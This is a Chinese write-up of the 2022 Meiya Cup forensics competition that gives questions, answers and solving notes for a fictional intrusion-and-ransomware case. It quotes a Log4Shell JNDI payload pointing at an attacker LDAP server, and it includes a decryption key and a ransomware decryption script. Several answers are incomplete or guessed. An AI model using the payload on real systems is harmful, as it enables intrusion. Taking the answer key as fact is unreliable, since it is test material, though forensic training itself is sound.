团队赛加密容器解密密钥
av?5CAXw;&N`X)6)%B>Y<`Gx[IVq<5F;mAQp]b@ftYpF6v,*88~%wF*CS}.w*7"S(,I[gJE((9cwT@zEh2mY$AK[aZzW&JFR<\FE}RC\Gjx[!ec^GrDne]xK)SuUPMWX
案件详情
2022年10月,警方收到AGC集团举报表示该公司网络的电邮系统有可疑连接及流量。 经过调查后,警方相信事件与本地一个IP地址有关,于是拘捕了一名男子朗尼 (Rooney),并在他家中检取了一些电脑,网络装置,手机作调查。
2022年10月下旬,两名巡警在街上截查一名男子王景浩(阿浩 KingHo)时, 在他的背包中找到一些从网上下载的制作油漆弹教学材料,阿浩曾作出反抗但最后被制服。经调查后,警员发现阿浩计划於某日向某人投掷油漆弹,警员随后将他拘捕并于他家中检取了一批电脑,手机作调查。深入调查后发现阿浩亦与AGC集团网络被入侵事件有关。
警方的电子数据取证小组在现场作出初步了调查并对涉案装置进行了电子数据取证。请你根据警方的资料,协助将事件经过还原。
AGC
先挂虚拟机,挂的时候要把他们全部选上
2. [填空题] 就AGC集团网络的流媒体服务器 (Media Server),有多少个本地用户曾经成功登录过? (以阿拉伯数字回答) (1分)
3
通过查看发现只有这三个
3. [填空题] 就AGC集团网络的流媒体服务器,有多少个本地用户曾经成功用 'ssh' (Secure Shell)登录过? (以阿拉伯数字回答) (2分)
3
登入日志搜pty
pty 用取证大师的话直接看用户登出信息就可以,这些使用ip的都是ssh
4. [填空题] 就上述的本地用户,成功通过 'ssh' 登录过该流媒体服务器多少次? (以阿拉伯数字回答) (3分)
12
取证大师接上图看一下一共有12次
5. [单选题] 试找找记录失败的登录尝试信息. 有以下哪一个名称曾尝试用 'ssh:notty' 登录该流媒体服务器? (2分)
A. iamhacker
B. hacking
C. hack
D. hacker
E. 以上皆非
C
查看他给的日志zip,里面的btmp日志是登入失败的
查看发现hack使用的这个指令失败了
6. [填空题] 就该流媒体服务器的本地用户, 有一个用户名是 'S' 开头的, 该用户的姓氏是什么? (以大写英文回答) (3分)
Sammy
7. [多选题] 该流媒体服务器是有使用Docker容器 (Docker Container) 的,当中包含以下哪个Docker镜像 (Docker Image) ? (3分)
A. apache2
B. ubuntu
C. centos
D. nginx
E. hello-world
F. 以上皆非
BCDE
8. [单选题] 就上述的Docker镜像,哪一个镜像在系统上运行中? (2分)
A. apache2
B. ubuntu
C. centos
D. nginx
E. hello-world
F. 以上皆非
D
只有nginx开启了端口
9. [多选题] 该流媒体服务器是使用 'WordPress' 建站 (Create Website) 的, 就 '比特币' 标题, 有以下的电子邮箱地址曾经留有评论? (2分)
A. cn.wordpress.org
B. root58462@mail.qq.com
C. hi456@163.com
D. root@163.com
E. user1@localhost.net
F. 以上皆非
BC
搭建网站
这些指令都是搭建网站的指令
要先看一下mysql和apache2是不是都启动了
都启动着,然后我们直接访问
发现能打开本地的页面
查看配置文件发现这个网站包括这两个conf文件,我们用ftp连接起来查看conf文件
查看文件目录
能查看,然后我们可以直接进入那个比特币的官网了
这种情况下,点击比特币发现他进不去
这是因为此时他DHCP随便给分配了一个IP所以我们访问不了
若我们把他改成原来的ip发现就可以进去了
但是我们还是看不到这两条评论,要进入网站数据库才行
先去wordpress里面找到数据库的账号密码
然后用navicat连接
后台没进去,因为他那个ip一直在变化
10. [单选题] 该流媒体服务器里其中一个本地用户是有使用 'calendar' 日历工具的, 日历内曾经提及以下哪个网站? (3分)
A. https://weibo.com
B. http://www.baidu.com
C. https://www.douyin.com
D. https://youku.com
E. https://www.binance.com
F. 以上皆非
E
打开日志往前翻一下可以看到之前的记录
11. [单选题] 该流媒体服务器里是有使用磁盘阵列 (RAID) 的, 该设备是使用哪一个 RAID 级别? (请选择最合适的答案) (1分)
A. RAID 0
B. RAIDz2
C. RAIDz3
D. RAID 10
E. RAID 5
F. 以上皆非
D在调查报告里面出现了这个raid组,我们用他给的指令试一下看一下
看这个报告发现他有两个镜像,然后每个镜像的东西又不一样,所以应该是raid10
12. [单选题] 该基本镜像存储池 (Basic Storage Pool) 里储存了一些视频档案, 请找出一段儿童色情影片, 该档案的最后修改时间是什么月份? (2分)
A. Jun
B. Jul
C. Aug
D. Sep
E. Oct
F. 以上皆非
D
这个迷住了应该就是所说的文件,然后查看
13. [填空题] 承上题,拥有该段儿童色情影片的用户名称是什么? (不要输入符号,以大写英文及阿拉伯数字回答) (1分)
root
14. [填空题] 就AGC集团网络流媒体服务器,曾经有用户搜索过有关于儿童色情影片的资料而得到搜索结果,该用户所输入的网址是什么? (不要输的入符号,以大写英文及阿拉伯数字回答,如 https://web3.com,需回答 HTTPSWEB3COM) (2分)
https://bit.ly/3xyi8b5
在历史记录里面发现了这个
去查看这个文件
然后url解码一下
发现了儿童色情这几个字 ,所以确定
15. [填空题] 该基本镜像存储池 (pool) 有一个快照 (Snapshot),快照的名称是什么? (不要输入符号,以大写英文及阿拉伯数字回答,如 media/mediapool@abc123,需回答MEDIAMEDIAPOOLABC123) (1分)
MEDIASTORAGE@VERESION1
使用搜索指令
16. [填空题] 就上述所找到的基本镜像存储池快照 (Snapshot),它储存了多少个档案? (以阿拉伯数字回答) (1分)
24
这个其实就是所说的存储池快照,发现有24个文件
21. [单选题] 分析IP地址61.238.217.108向AGC服务器10.0.66.184发送的第一个 'GET' 指令,它请求的统一资源定位系统 (Uniform Resource Locator - URL) 是什么? (1分)
A. http://155.137.195.111:8080
B. http://www.w3.org/2003/05/soap-envelope
C. http://61.238.217.108:8000
D. 以上皆非
C
22. [单选题] IP地址61.238.217.108曾经向AGC服务器10.0.66.184发送 'POST' 指令,它在 'HTML Form' 项目的 'uname' 栏所输入的字符串是什么? (1分)
A. root
B. ${jndi:ldap://61.238.217.108:1389/a}
C. application/x-www-form-urlencoded
D. password
B
23. [单选题] AGC服务器10.0.66.184收到IP地址61.238.217.108的 'POST' 指令后,它执行了哪些行动? (2分)
A. 使用端口46858连接IP地址61.238.217.108的LDAP服务器的指定端口
B. 于IP地址61.238.217.108下载了Exploit.class
C. 使用端口49264连接IP地址61.238.217.108发送同步要求
D. 以上皆是
D
BC都有所以选D
24. [填空题] 在上述行动后,IP地址61.238.217.108利用哪个端口 (Port) 向AGC服务器10.0.66.184发出指令? (以阿拉伯数字回答) (1分
9001
这是后面发出的指令,可以看到是9001端口与49264的交流
25. [多选题] AGC服务器10.0.66.184里有一个AGC目录 (Directory),它的子目录 (Sub Directory) 包含以下哪一个? (2分)
A. Accounting
B. Picture
C. Staff
D. Sambashare
E. Retail
ACE
查看指令发现这些
26. [多选题] 入侵者迸入AGC服务器10.0.66.184后,他成功执行以下哪些指令? (2分)
A. 檢视了readme.txt内容
B. 删除了三个档案
C. 删除了一个目录 (Directory)
D. 替档案改名
E. 建立了两个txt档案
DE
分析命令,不懂得就去chatgpt上面搜指令什么意思
这个是下载cGhvdG9....那个文件
这个指令是重命名
将see readme.pgf for suprise 输入到创建的suprising_photo_at_readme.pdf.txt文件下
查看上面创建的文件
删除这两个文件
创建readme.txt内容为you should check your .....
27. [单选题] 入侵者曾经传送一个档案到AGC服务器10.0.66.184并将它改名 (Rename),这个档案的原来名称是什么? (1分)
A. cGhvdG9zT0Zyb2NreQ==
B. Finanical.xls
C. readme.txt
D. anonymous
A
同上题
28. [单选题] 承上题,该档案原档的建立日期是什么? (2分)
A. 2022-10-21 08:10:30 (UTC+0)
B. 2022-10-21 16:19:39 (UTC+0)
C. 2022-10-22 08:10:30 (UTC+0)
D. 2022-10-22 14:22:06 (UTC+0)
E. 2022-10-22 16:19:39(UTC+0)
D
29. [单选题] 承上题,该档案的SHA-256哈希值是什么? (3分)
A. a6eef1... ...27364c
B. 54785c… ...fe86f0
C. 961f2b… ...647d55
D. a00e6c… ...d0eaab
E. 以上皆非
E
这道题目正常是通过wireshark直接导出的,但是我的wireshark没有导出ftp data的功能,研究发现可以直接通过kaliforemost分离
高版本wireshark直接就可以通过ftp-data导出文件来
31. [单选题] 分析AGC-CS计算机 (Computer) 里最初的作業系統 (Windows) ,它的实際安装时间是什么? (以时区UTC+8回答) (3分)
A. 2022-09-26 14:35:17
B. 2022-09-26 21:35:17
C. 2022-09-27 05:35:17
D. 2022-10-05 03:52:15
E. 2022-10-05 11:52:15
A
这道题不用取证大师来做就要吃亏了用取证大师可以看到这条消息
说明他是修改过系统时间的,然后我们看现在的系统时间
要减去他之前延后的那部分,所以选A
32. [单选题] AGC-CS计算机里的 'Acrobat DC' 软件的安装时间是? (以时区UTC+8回答) (如答案为 2022-12-29 16:01:59,需回答 20221229160159) (1分)
A. 2022-09-28 19:01:40
B. 2022-09-28 07:18:33
C. 2022-08-30 19:01:40
D. 2022-08-30 07:18:33
A
发现没有这个选项,用取证大师发现有两个
33. [单选题] AGC-CS计算机里的用户 'Carson' 链接了一个网络磁盘机 (Network Drive),在下列哪一个档案有相关资料? (2分)
A. \Users\Carson\NTUSER.DAT
B. \Users\admin\NTUSER.DAT
C. \Windows\System32\config\SYSTEM
D. \Windows\System32\config\SOFTWARE
E. \Windows\System32\config\SECURITY
A
根据下题,网络磁盘机使用IP连接,所以直接查看ip
跳转源文件
34. [单选题] 承上题,用户 'Carson' 连接的网络磁盘机的IP地址是什么? (1分)
A. \\192.168.182.134\
B. \\192.168.182.134\photo
C. \\192.168.182.134\share
D. \\192.168.182.134\AGC
E. \\192.168.182.134\AGC photo
C
接上题
35. [填空题] 分析计算机里的电邮数据,当中包含嫌疑人王景浩可能的居住地址,请回答他住址的楼层 (以阿拉伯数字回答) (1分)
45
36. [填空题] 承上题,王景浩使用的信用卡号码最后四位数字是? (1分)
6717
37. [填空题] AGC-CS计算机用户 'Carson' 曾经收到一个电邮并通过里面的链结下载了一个可疑的 'Word' 文件,那个档案的档案名是什么? (不要输入 '.',以大写英文及阿拉伯数字回答。如 Cat10.jpg,需回答CAT10JPG) (1分)
KEFMUONDOCX
直接到下载存储路径里面找这个word
38. [单选题] 承上题,分析该 'Word' 文件,它的可能用途是? (3分)
A. 访问一个网站
B. 记录键盘操作
C. 把档案加密
D. 改变桌面壁纸
E. 关闭计算机
A
既然这样子问,那就说明这个word应该是个恶意文件,所以我们猜测应该是王景浩发的恶意软件
导出挂到沙箱里面分析
39. [单选题] AGC-CS计算机里有一个名为 'admin' 的用户,它是在何时被建立的? (以时区UTC+8回答) (1分)
A. 2022-09-28
B. 2022-09-29
C. 2022-09-30
D. 2022-10-01
E. 以上皆非
B
最早登录时间是29号
40. [填空题] 黑客第一次采用用户 'admin' 通过远程桌面协议 (Remote Desktop Protocol - RDP) 登录了AGC-CS计算机的时间是? (以时区UTC+8回答) (如答案为 2022-12-29 16:01:59,需回答 20221229160159) (2分)
20220929204102
通过流量分析我们可以知道这个ip就是王景浩登录的,所以admin整个就是王景浩登录的
41. [填空题] 黑客入侵AGC-CS计算机后下载了一个扫描端口 (Port Scanning) 的软件,这软件的真正名称是? (以大写英文及阿拉伯数字回答) (3分)
查看最近保存的文件,发现了这个,怀疑比较可疑,然后我们导出这个文件,分析发现是一个可疑文件,然后连接了一个github的端口检测
虽然这个29号登录的谷歌下载就只有这一个,但我们去搜putty发现这是个远程连接的不是端口扫描,所以不是谷歌下载的东西
42. [填空题] 承上题,黑客采用上述软件取得一些计算机的IP地址及媒体访问控制地址 ('Media Access Control' Address - MAC Address) 并存到一个名为 'ip.txt' 的档案。 当中 '192.168.182.130' 计算机的MAC地址是什么? (不要输入 ':' 或 '-' ,以大写英文及阿拉伯数字回答) (3分)
查看最近访问的文档
但是我们过去发现找不到这个文档,说明被删除了
但这件事情是王景浩搞得,所以一定是传到了自己的电脑上面,去他的电脑上面找这个文档
43. [填空题] AGC-CS计算机里的一个跳转列表 (Jumplist) 显示了用户 'admin' 曾经采用记事本 (Notepad) 打开了一个文字档案,这个文字档的SHA-256哈希值是什么? (以大写英文及阿拉伯数字回答) (3分)
仿真查看notepad有记录,发现还是这个ip.txt
证明了应该是王景浩入侵了这个acg集团然后盗取了这个文档然后删除了原来的文件
44. [单选题] 黑客除了通过 'RDP' 外,还采用什么软件远端控制 (Remote Control) AGC-CS计算机? (1分)
A. VNC
B. Teamviewer
C. Anydesk
D. Splashtop Business Access
E. RemotePC
C
去查了一下发现Teamviewer是远程控制软件,而且这个显示名kingking就像是王景浩
ACG_Server这个是个raid重组,我这里使用ufs把三块dsk组成一个然后用取证大师取证分析得到
导出agc0作为镜像,这里是dsk的镜像,用火眼的仿真起来会不能使用,这里要使用美亚的仿真来做,进去之后会发现网卡不行,这里要配置网卡参考这篇文章Proxmox VE 物理环境修改后配置联网_proxmox网络重置命令-CSDN博客
配置完成以后就可以使用xsheel连接了
45. [填空题] AGC_Server里LVM (Logical Volume Management 逻辑卷轴管理) 的 VG (Volume Group 卷组) 'pve' 共有多少PE (Physical Extent 物理块) ? (以阿拉伯数字回答) (1分)
先raid重组起来,使用指令来看这个题目
vgdisplay
114147
46. [填空题] AGC_Server里LVM 的 LV(邏輯卷)"pve-data" 使用了多少百分比的空間? (不用填寫 '%',以阿拉伯数字回答) (3分)
继续使用指令df -h /dev/mapper/pve-data
2
47. [多选题] AGC_Server里的 'Proxmox' 虚拟化环境 (Virtual Environment - VE) 有哪一个用户? (2分)
A. root
B. VM_admin
C. sysadmin
D. acl
E. tss
先说一下这个Proxmox,这个是这个虚拟机里面已经配置好的,我们要访问这个虚拟机就要先把他的ip修改好,最开始只改了ens33,然后我去访问这个网站发现进不去,后来又看一下,这个地方它默认注释掉了ipaddress和gateway,这里要改成虚拟机的ip和网关,网关一定要配好,不知道的话去网络虚拟编辑器里面看nat设置,不对的话也是进不去的
配置好的页面是这个样子的 ,要重启一下使用这个指令systemctl restart networking然后我们直接访问PVC进网页
先看一下PVC的端口号netstat -altp
我刚开始访问这个网站用的是172.16.80.210:8006结果怎么都进不去,然后我重启之后看到了这个
突然意识到要用https,然后就进来了
可以看到一个大体的框架,下面有指令
看数据中心的用户可以看到有这两个,所以选AC
48. [填空题] 分析 'VM' (虚拟机) 编号 '111' AGC网站的网页服务器日志,当中记录了黑客曾向该服务器发出多少次與远程代码執行 (Remote Code Execution) 的网络攻击? (以阿拉伯数字回答) (2分)
17次,没有发现这个
VM虚拟机里面有三个镜像,正常我们是把三个镜像导出来之后用取证软件来跑和方针的,但是这里导出显示少东西,而且我用ufs来导出发现一直失败,可能是标准版的问题,要花钱买,但是我们可以通过ufs来看这里面的东西,在这个页面可以看到
关于这三个镜像我导出来挂载或者仿真都不行,只能手搓了,下面是手搓的全部解题过程
49. [单选题] 哪一个IP地址尝试登录'VM' (虚拟机) 编号 '111' 失败次数最多? (1分)
A. 38.242.130.207
B. 218.92.0.206
C. 43.142.93.22
D. 121.202.141.105
E. 61.238.217.10
查看var/log下的btmp文件,搜了一下这五个选项,只有E出现了两次
50. [填空题] 黑客在入侵 'VM' 编号 '111' 后,打算涂改AGC公司的网页,黑客在传送相关档案时所用的端口 (Port) 是什么? (以阿拉伯数字回答) (3分)
在这个目录下面看到了王景浩上传的页面修改的index.html文件
去翻王景浩的电脑看到了它使用的scp指令来控制AGC的服务器,scp和ssh一样,默认都是22端口
51. [多选题] 根据 'VM' 编号 '111' 里的网页服务器 (Web Server) 的设定,访客可从下列哪个网页地址访问这个服务器? (2分)
A. localhost
B. www.ag.com.shop
C. www.agcom.shop
D. agcom.shop
E. www.agcom.com
在/etc/nginx/conf.d文件夹下面的agcom.shop.conf文件里面可以看到
sever name那一个里面所以选AC
52. [填空题] 黑客曾入侵 'VM' 编号 '111' 里的电邮系统 'Xeams',他登录的时间是? (以unix时间戳回答,格式如:1665049779010) (2分)
题目中说到了这个Xeams,在前面的浏览时我发现了在OPT这个文件夹下面有这个Xeams,进去查看AuditLogs文件
里面有好多个log,看了一下最后一个发现了这个王景浩的ip61.238.217.108
然后时间戳是1665049779010
53. [单选题] 黑客在入侵后盗用AGC员工电邮户口及冒充AGC员工回复了电邮给客户,发出这封电邮的操作系统 (Operating System) 及电邮软件 (Mail Agent) 是什么? (2分)
A. Mac OS X 10.15 rv:102.0 Thunderbird/102.3.0
B. Mac OS X 10.15 rv:102.0 Thunderbird/91.13.1
C. Mac OS X 10.11 rv:91.0 Thunderbird/91.13.1
D. Mac OS X 10.11 rv:60.0 Thunderbird/60.9.1
E. Windows 10 Pro Outlook 2016
结合上题,先时间戳转一下时间
然后来这个opt/Xeams/GoodEmails里面看一下20021006的文件夹
看到了具体的信息,选D
54. [单选题] 黑客在 'Proxmox' 里留下了一个被加密了的程序 (Program),在解密后它的SHA-256哈希值 (Hash Value) 是什么? (2分)
A. C89D7A... ...8C4E76
B. C7141F... ...64BF65
C. E9433E... ...1A5134
D. 45CE1C… ...79BD4A
E. 0ACAA5… ...AB7ECE
找到他的历史命令记录,在home/sysadmin下面,打开看了一下他下载了三个文件,然后把他们三个搞到了base.py里面,然后base64解base.by里面的内容,然后删除这个文档
123的文件都在这个目录下面
把他们导出来然后按照他的指令重新进行一遍
这里我使用我的kali来进行复刻得到,就是根据他的那些指令来做
可以看到加密过程,算一下这个玩意的sha256
55. [填空题] 承上题,分析程序代码 (Program Code),上述程序的档案名应该是什么? (不要输入 '.',以大写英文及阿拉伯数字回答。如 Cat10.jpg,需回答CAT10JPG) (3分)
通过上图可以看到是这个ransomware-ver-finalv2.py
56. [单选题] 于虚拟机 'VM' 编号 '111' 里的档案 '\srv\samba\share\AGCphoto\DSC01139.JPG' ,照片中出现的街道名称是? (2分)
A. 河背街
B. 沙咀道
C. 众安街
D. 香车街
E. 川龙街
C
根据上面的那个python脚本来提取出解密脚本来
files_allfiles2 = []
path2 = os.getcwd()
for root, dirs, files in os.walk(path2):
if "RANSOM_NOTE.txt" in files:
files.remove("RANSOM_NOTE.txt")
if "ransomware-ver-finalv2.1.py" in files:
files.remove("ransomware-ver-finalv2.1.py")
if "decrypt-ver-final.py" in files:
files.remove("decrypt-ver-final.py")
for file in files:
filepath = root + "/" + file
files_allfiles2.append(filepath)
print(files_allfiles2)
with open("/tmp/thekey.key", "rb") as keyread:
secretkey = keyread.read()
for file2 in files_allfiles2:
with open(file2, "rb") as unlockfile:
contents2 = unlockfile.read()
decryptedContents = Fernet(secretkey).decrypt(contents2)
with open(file2, "wb") as unlockfile:
unlockfile.write(decryptedContents)
这个应该在仿真起来的虚拟机里面跑,但是我没有仿真起来,不过这个脚本是没有问题的,仿真出来是这个样子的,手搓实在是出不来了
王景浩
17. [单选题] 王景浩的USB记忆棒里有一个 'Data' 文件夹 (Folder),它存有哪一种类型的密钥文件? (1分)
A. pem
B. cer
C. crt
D. key
E. 以上皆非
A
使用的rsa所以它对应的是pem
18. [多选题] 承上题,'Data' 文件夹里有一个被加密了的档案,它是被哪一种加密方法加密? (2分)
A. Symmetric
B. PGP
C. Twofish
D. RSA
E. Triple DES
D
19. [单选题] 尝试将档案解密,该档案属于哪一个类型 (File type)? (2分)
A. exe
B. ods
C. rtf
D. sql
E. 以上皆非
根据加密解密脚本编写解密的脚本 ,这个脚本是我参考的这个师傅的
2022美亚杯团体赛_gv2022video.com_WXjzcccc的博客-CSDN博客
拿到手的是一个sql
20. [多选题] 承上题,找出以下哪一个名字出现在该档案里? (3分)
A. Armand To
B. Adam Smasher
C. Beverly Kot
D. Huma Chan
E. 以上皆非
AC
直接搜
30. [多选题] 通过取证调查结果迸行分析 (包括但不限于以上问题及情节),以下哪项关于王景浩的推断是正确的? (5分)
A. 曾经采用他的计算机入侵AGC集团网络
B. 传播儿童色情物品
C. 于AGC集团取得大量客户资料
D. 通过VPN取得Rooney家里的IP地址
E. 企图更改AGC集团的网页
暂时先放一下
ACDE做完之后再来看这个就很明了了
58. [单选题] 王景浩计算机的操作系统 (Operating System) 版本是什么? (1分)
A. 10.4.11
B. 10.9.5
C. 10.10.5
D. 10.11.6
D
59. [填空题] 王景浩的计算机当前有多少个用户 (包括访客 'Guest' )? (以阿拉伯数字回答) (1分)
6
取证大师直接看
60. [填空题] 王景浩的计算机里有一个用户被删除,被删除的用户名称是什么? (以大写英文回答) (1分)
BROTHER
61. [填空题] 王景浩的计算机有多少个 '聚焦' 的搜索记録 (Spotlight Search) ? (以阿拉伯数字回答) (1分)
9
直接搜索
62. [单选题] 当用户设置了自动登录 (Auto Login) 后,王景浩计算机的操作系统会产生哪个档案? (2分)
A. manifest.plist
B. info.plist
C. PasswordPanel.strings
D. kcpassword
D
结合选项搜一下mac自动登录会产生什么,可以看到会产生这个kcpassword,他是自动登录密码设置文件在这个目录下 /private/etc/kcpassword,下一题也有提示
63. [单选题] 王景浩计算机的登录密码 (Login Password) 是什么? (2分)
A. 1qa@WS3ed
B. 3ed$RF5tg
C. 5tg^YH7uj
D. 2ws$RF6yh
D
上一问知道了kcpassword是保存密码的文件,所以直接去找这个文件,这个文档内容被加密了,不过x-ways可以直接看导内容
64. [单选题] 在王景浩的计算机里,他最后使用哪个电邮地址登录 'iCloud' 账号? (2分)
A. kinghoo0w0@gmail.com
B. wonghoo588@yahoo.com
C. kingho726@aol.com
D. kinghoo0w0@yahoo.com
A
取证大师
65. [多选题] 王景浩计算机里的手机备份 (iTunes Backup) 包含哪些iOS版本? (2分)
A. 12.5.6
B. 15.4
C. 15.5
D. 16.0.3
AC
66. [填空题] 王景浩曾经将一台 iPhone 6 连接他的计算机,请问它最后的连接时间是什么? (以时区UTC+8回答) (如答案为 2022-12-29 16:01:59,需回答 20221229160159) (2分)
20220819152402
67. [单选题] 苹果手机备份的密码 (iTunes Backup Encryption Password) 会记录在什么档案? (2分)
A. Info.plist
B. privacy.json
C. Manifest.plist
D. PasswordPanel.strings
C
常识,做题多了就知道了
68. [多选题] 以下哪种工具可以用作破解密码? (1分)
A. Passware
B. John The Ripper
C. HashCat
D. Password Recovery Toolkit
ABCD
查了一下发现都可以
69. [多选题] 通过 'hashcat' 破解 'iTunes Backup' 密码需要制订一个 'txt' 档案,若该备份的手机iOS版本是10以上,需要按照下列哪个提示字符 (String) 的数据去制订这个 'txt' 档案? (3分)
A. WPKY
B. ITER
C. SALT
D. DPIC
E. DPSL
ABCDE
70. [填空题] 王景浩采用了4位数字加密了他的iPhone XR的备份,分析它的密码是什么? (以阿拉伯数字回答) (3分)
导出文件备份,然后用passware爆破manifest.plist 拿到密码
71. [填空题] 最后一次连上王景浩计算机的3D打印机的IP 地址是什么? (不要输入答案中的 '.',以阿拉伯数字回答) (2分)
1014140
查看他最后的连接时间,然后去找这段时间访问的ip
明显第二个是
72. [填空题] 3D打印机最后一次在王景浩的计算机尝试打印的时间? (以时区UTC+8回答) (2分)
20221020162806
73. [单选题] 最后一次经由王景浩计算机打印的3D图档案名字是什么? (2分)
A. CE3_balljoint_extender.gcode
B. um3-penguin-real-mini-keychain-merged-tpu.gcode
C. CE3_Prancer.gcode
D. CE3_2020-psu-atx-mount.gcode
D
查看最近访问的文档,发现只有D选项
74. [单选题] 王景浩计算机的Safari浏览器的默认搜索引擎 (Default Search Engine) 是什么? (2分)
A. 百度
B. 谷歌
C. 360
D. Safari
B
看这个浏览器的历史记录发现都是谷歌
75. [单选题] 分析王景浩计算机的数据,王景浩的比特币钱包 (Bitcoin Wallet) 地址是什么? (2分)
A. bc1quw… ...zpzjzt
B. bc1qm… ...5f7n9g
C. bc1q79… ...h4sq52
D. bc1qsl… ...je7hkk
A
在邮件里发现了这个东西
76. [单选题] AGC公司员工 'Carson' 有一个由公司发给他的电邮账户,分析王景浩的计算机数据并找出 'Carson' 的电邮账户密码。 (2分)
A. AGC2020@pw
B. AGC2012@PW
C. AGC2020@hkg
D. AGC2021@PW
A
77. [填空题] 王景浩曾经冒充AGC公司员工 'Carson' 发送电邮给AGC 客户,这封电邮的 'Message-ID' 是什么? 回答它的首8位数值。(以大写英文和阿拉伯数字回答,如 4GEF90GD) (2分)
004001D8
78. [多选题] 王景浩采用计算机里的哪种工具进入和盗取AGC公司的数据? (2分)
A. Teamviewer
B. OpenVPN
C. Remote Desktop Manager
D. Tor Browser
AB
前面发现他用了Teamviewer然后后面又发现使用了VPN
79. [多选题] 王景浩在AGC公司盗取了下列什么类型的档案? (2分)
A. ost
B. xlsx
C. jpg
D. docx
AB
80. [填空题] 王景浩的计算机于2022年9月29日曾经接上一个虚拟专用网络 (Virtual Private Network - VPN),这个VPN的IP地址是什么? (不要输入答案中的 '.',以阿拉伯数字回答) (2分)
61.238.217.108
根据上面问题说的openvpn找到文件,然后查看conf文件
81. [填空题] 装置 '「KingHoo」的iPhone' 的蓝牙媒体访问控制地址 (MAC Address) 是什么? (不要输入答案中的 ':' 或 '-' ,以大写英文及阿拉伯数字回答) (1分)
c8-1e-e7-4a-f9-33
这个只能用取证大师找,火眼取不到
82. [单选题] 王景浩何时将 '小宝' 加为iPhone XR的手机联络人 (Contact) ? (以时区UTC +8回答) (1分)
A. 2022年07月14日
B. 2022年07月15日
C. 2022年07月16日
D. 2022年07月17日
E. 2022年07月18日
A
将导出的iphone备份挂载到火眼输入密码
83. [单选题] 王景浩的iPhone XR显示他的汇丰银行户口于2022年9月19日收到多少存款? (1分)
A. HKD298.8
B. HKD344.7
C. HKD396
D. HKD543
E. HKD465.1
B
84. [单选题] 王景浩的iPhone XR没有收藏 (Bookmark) 哪家音响品牌的网页? (1分)
A. KEF
B. EDIFIER
C. BOSE
D. YAMAHA
E. Bowers & Wilkins
D
85. [单选题] 王景浩的iPhone XR手机记录了他曾于2022年8月26日试飞无人机, 当天试飞的地点在哪里? (2分)
A. 大埔海滨
B. 启德
C. 数码港
D. 西环
E. 将军澳
D
提到飞行记录,我们首先想到的是大疆,然后直接去找文件
用物联取证来分析,要将整个dji文件夹导出来
距离西环比较近
86. [单选题] 王景浩于2022年8月26日试飞无人机的总飞行时间 (Total Flight Time) 多久? (2分)
A. 6分58秒
B. 8分10秒
C. 9分6秒
D. 11分1秒
E. 15分33秒
看的是飞起来的时间,没有飞起来的不算
87. [多选题] 王景浩用 iPhone XR 拍了一张照片'IMG_0012.HEIC',那照片什么地方曾被修改? (3分)
A. 拍摄时间
B. 经纬度
C. 时区
D. 档案名称
E. 拍摄装备
AB
88. [填空题] 承上题,那张照片修改后的经纬度是什么? (不要输入答案中的 '.',将经纬度合并回答。 如 22.2846135 114.1739116,需回答 2228461351141739116) (3分)
工具到期了
96. [填空题] 王景浩 SD 记忆卡 (SD Memory Card) 的储存容量有多少个字节 (Byte) ? (以阿拉伯数字回答) (1分)
8001304896
97. [单选题] 检视记忆卡上硬盘分区表 (Partition Table) 资讯,记忆卡共有多少个分区 (Partition) ? (1分)
A. 1
B. 2
C. 3
D. 4
E. 0
B
挂在出来分析一下发现有两个
98. [单选题] 检视记忆卡上硬盘分区表资讯,第二个分区的分区代码 (Partition Code) 是什么? (1分)
A. 07
B. AF
C. 0C
D. 2B
E. 01
A
99. [多选题] 记忆卡的档案不能被读取,记忆卡受损的原因包括? (2分)
A. 目录项结构 (Directory Entry) 受损
B. 启动扇区表 (Master Boot Record) 受损
C. 文件分配表 (File Allocation Table - FAT) 受损
D. 引导扇区 (Boot Sector) 受损
E. 以上各项皆是
AB
100. [填空题] 承上题,通过分析及手动恢复还原,记忆卡里有多少个出錯的情况出现? (以阿拉伯数字回答) (3分)
没有还原出来
101. [多选题] 记忆卡第一个文件系统 (File System) 中有一个图片档案,它的SHA-256哈希值是 'F7E003781456D2E01CFE0EB46988D5BB433ADF9841164BBB90BAC67C0C9B21AF'。该档案显示了哪些影像? (2分)
A. 人
B. 山
C. 汽车
D. 交通灯
E. 天空
102. [单选题] 检视记忆卡的数据,在2022年10月9日约中午12时5分至12时15分之间的录像 (Video) 中,曾经出现哪一个IP地址? (2分)
A. 61.238.217.108
B. 155.137.190.123
C. 192.168.1.66
D. 185.200.100.242
E. 213.104.156.111
D
导出这段时间的video然后看一下,再某个video里面发现了这个
103. [填空题] 恢复还原后的记忆卡中,第二个文件系统显示有多少个空闲簇 (Free Cluster)? (以阿拉伯数字回答) (2分)
emmm
104. [填空题] 记忆卡第一个文件系统中有一个视频档,它的SHA-256哈希值是 '847E1E5FEF64B49C8D689DC3537D619B87666619A7C1EF0CC821153641847C19',这个视频的档数据存在文件系统 (File System) 的最后的簇号 (Last Cluster Number) 是什么? (以阿拉伯数字回答) (2分)
搜索SHA256找到这个文件
然后查看这个文件的簇号522399
105. [单选题] 尝试分析记忆卡数据結構受损的原因,通过合适的方法把数据恢复到原本没有出错的状况,记忆卡的SHA-256哈希值是什么? (3分)
A. E63DF0... ...8627D3
B. 3FD99E… ...17B6DE
C. 3BADAA… ...666A8F
D. BBB211… ...E00710
E. AA9E81… ...2C04FE
C
朗尼
89. [单选题] 朗尼草莓 (Raspberry) 计算机操作系统的主机名称 (hostname) 是什么? (1分)
A. OpenWrt
B. admin
C. root
D. AsusRt
E. DDwrt
A
草莓计算机只有一个bin文件,我们只能手搓
90. [多选题] 以下哪项对于朗尼草莓计算机操作系统的描述是正确的? (2分)
A. LAN地址是 192.168.1.24
B. 提供点对点隧道协议 (Point-to-Point Tunneling Protocol - PPTP) VPN服务
C. WIFI登录密码为'OpenWrt'
D. 提供网络时间协议 (NTP) 服务
E. 时区设置相等于UTC+8
不是基于p2p,而是ssl
没有开启ntp
密码是59814758
91. [多选题] 承上题,'VPN' 服务器的IP地址及端口 (Port) 是什么? (2分)
A. IP地址 61.238.217.108
B. IP地址 192.168.8.1
C. IP地址 103.10.12.106
D. 端口 33248
E. 端口 1194
F. 端口 1701
AE
92. [填空题] 朗尼草莓计算机操作系统设定了一个档案来储存系统的 'log_file' ,档案名称是什么? (不要输入 '.',以大写英文及阿拉伯数字回答。如 Cat10.jpg,需回答CAT10JPG) (2分)
SYSlog
93. [单选题] 承上题,检视上述的档案,当中有几个IP地址曾经成功登录这个系统的 'VPN' 服务? (3分)
A. 1
B. 2
C. 3
D. 4
E. 0
B
查看文件就两个
